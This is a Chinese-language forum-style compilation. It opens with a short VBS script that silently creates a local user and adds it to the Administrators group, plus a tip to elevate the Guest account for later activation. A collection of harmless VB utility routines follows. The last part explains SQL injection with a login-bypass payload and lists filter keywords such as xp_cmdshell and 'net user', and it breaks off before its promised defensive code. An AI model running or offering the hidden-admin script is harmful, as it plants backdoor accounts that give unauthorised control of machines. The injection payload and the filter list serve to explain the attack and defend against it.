一个实用小程序,稍作修改即可用于******,多谢”吃水的蚊子(328936206)”不惜“以身试法”进行测试。
 
vbs脚本内容如下:
 
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net user wenzi wenzi /ad",0)
b=wshshell.run ("net localgroup Administrators wenzi /add",0)
 
也可修改通过这个程序将guest加入到管理员组,需要时随时激活帐号即可。
 
注意:
保存文件的扩展名必须是.vbs,即可隐藏运行指定的命令或批处理程序。这个vbs脚本也可以在其它环境中直接调用。
=====================================================================
一组VB实用小程序函数(收集于"中华网络安全联盟")
 
用VB实现编程离不开函数调用及Windows API函数的调用,以下是笔者收集的一些实用的小例程,它们可以直接用在你的实际编程中,也可以根据实际应用加以扩充完善。其中涉及Windows API函数调用的代码你可以从VB5.0系统的API函数查看器中复制函数定义内容,以避免出错。
  1.系统型表单
  系统型意味着用户完成当前表单操作之前无法进行其它操作,这对于编制系统口令保护界面尤为重要。如果你希望当前表单系统型表单,需如下定义API函数:
Declare Function SetSysModalWindow Lib "User" (ByVal hWnd As Integer) As Integer
  然后调用:oldSysModal = SetSysModalWindow([Form].hWnd)
  2.获取驱动器类型
  代码如后:
Declare Function GetDriveType Lib “Kernel" (ByVal nDrive As Integer) As Integer
Global Const DRIVE_REMOVEABLE% = 2, DRIVE_FIXED% = 3
Global Const DRIVE_REMOTE% = 4

  3.表单在对中
  本子程序功能使表单定位在屏幕中央,在表单中任何需要表单对中的地方只需加入一行代码:
“centerwindow.me”即可成功调用。
Public Sub CenterWindow(f As Form)
f.Top = (Screen.Height * .5) - (f.Height * .5)
f.Left = (Screen.Width * .5) - (f.Width * .5)
End Sub

  4. 定义变量
  许多的程序员习惯于如下定义变量:
Dim iNum, iNextNum, iLastNum as Integer

  实际上只有最后一个变量被设为了整型,前两个变量则是系统的缺省的Variant 数据类型,而Variant 数据类型可用来替换任何数据类型,显然对于精练的程序设计是不利的。 正确的方法如下:
Dim iNum as Integer
Dim iNextNum as Integer
Dim iLastNum as Integer

  5. 使文本高亮
  本子程序使被触发的诸如文本,标签等控件的文本被选中
Public Sub SetSelected()
Screen.ActiveControl.SelStart = 0
Screen.ActiveControl.SelLength = Len(Screen.ActiveControl.Text)
End Sub

  6. 关闭其它程序
  下面的代码可关闭内存中的其它程序
  title = "MyAPP" '定义你需关闭的程序窗口的标题
ihWnd = findWindow(0&, Title)
ihTask = GetWindowTask (ihWnd)
iRet = PostAppMessage(ihTask, WM_QUIT, 0, 0&)

  7. 文件存在否?
  本函数返回查找的文件是否存在。
Function FileExist(Filename as string) as Boolean
FileExist = Iif(Dir(Filename) <> "", True, False)
End Function

  8. 主程序唯一
  用下面提供的代码作你的主程序可防止应用程序的多重执行,你应当将它放在确信需要它的代码模块内。
Public Sub Main()
If App.PrevInstance Then
BringWindowToTop frmMain.hwnd
Else
Load frmMain
End If
End Sub

  上面这些精悍的代码对于专业程序员来说非常有实用价值,希望你能从中获得启发。
=================================================
防范SQL注入式***JS版本(收集于"月光软件站")
 
SQL注入式***是利用是指利用设计上的漏洞,在目标服务器上运行Sql命令以及进行其他方式的***
动态生成Sql命令时没有对用户输入的数据进行验证是Sql注入***得逞的主要原因。
比如:
如果你的查询语句是select * from admin where username='"&user&"' and password='"&pwd&"'"
那么,如果我的用户名是:1' or '1'='1
那么,你的查询语句将会变成:
select * from admin where username='1 or '1'='1' and password='"&pwd&"'"
这样你的查询语句就通过了,从而就可以进入你的管理界面。
所以防范的时候需要对用户的输入进行检查。特别式一些特殊字符,比如单引号,双引号,分号,逗号,冒号,连接号等进行转换或者过滤。
需要过滤的特殊字符及字符串有:
   net user
   xp_cmdshell
   /add
   exec master.dbo.xp_cmdshell
   net localgroup administrators
   select
   count
   Asc
   char
   mid
   '
   :
   "
   insert
   delete from
   drop table
   update
   truncate
   from
   %
下面是我写的两种关于解决注入式***的防范代码,供大家学习参考!
js版的防范SQL注入式***代码: